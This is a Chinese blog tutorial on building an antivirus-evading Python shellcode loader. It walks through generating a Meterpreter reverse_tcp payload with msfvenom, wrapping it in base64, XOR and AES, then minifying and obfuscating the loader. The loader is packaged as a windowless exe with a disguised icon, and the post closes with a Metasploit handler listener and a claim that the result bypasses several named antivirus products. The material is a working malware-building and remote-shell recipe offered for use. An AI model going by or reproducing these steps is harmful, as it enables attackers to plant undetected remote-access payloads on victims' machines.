Pythonshellcode编码+混淆免杀

Python免杀shellcode加载器

一、工具介绍

免杀方式:

  1. msfvenom生成raw格式的shellcode–>base64–>XOR–>AES,
  2. 将python代码缩小并混淆最后生成exe
  3. 2022.9.18目前能过DF、360,电脑管家,火绒

二、安装与使用

1、获取项目

git clone https://github.com/HZzz2/python-shellcode-loader.gitcd python-shellcode-loaderpip install -r .requirements.txt

2、生成shellcode msfvenom方式,或者生成CS马raw的shellcode

#生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw

3、base64编码shellcode并替换jiami.py中的值

#base64
base64 -w 0 -i rev.raw > rev.bs64
cat rev.bs64
复制base64的值替换jiami.py中payload 也就是 第二十四行 sc='payload'
vim jiami.py

4、加密base64并替换main.py中的值

#加密base64后的shellcode
python3 jiami.py
#会生成一个aes-xor.txt的文件
cat aes-xor.txt
复制文件里的值(经过XOR和AES加密后)复制的值替换main.py中的payload 
vim main.py
也就是第四十一行 jiami_sc='payload'

5、缩小和混淆py代码

缩小python代码
pyminify main.py --output main-mini.py
vim main-mini.py
混淆main-mini.py中的python代码https://pyob.oxyry.com/在线混淆
混淆后的代码放到main-mini-ob.py
vim main-mini-ob.py

在这里插入图片描述

6、打包成可执行文件exe

#打包成exe,kali命令如下
pyinstaller -Fw -i .setting.ico --key=leslie main-mini-ob.py
但是提示我缺少模块,懒得下了,我就放Windows里打包一下了
pyinstaller.exe -Fw -i setting.ico --key=leslie main-mini-ob.py 
-F 打包为单文件 -w 不显示窗口 -i ico图标文件 --key 加密字节码的密钥等待打包完成,打包好后的可执行程序在dist目录中

在这里插入图片描述

7、kali用msf进行监听本地4444端口

msfconsole
use  exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set lhost 127.0.0.1
set lport 4444

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
8.可以看到免杀效果不错的
9.感谢HZzz2师傅做的免杀,真的香~

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值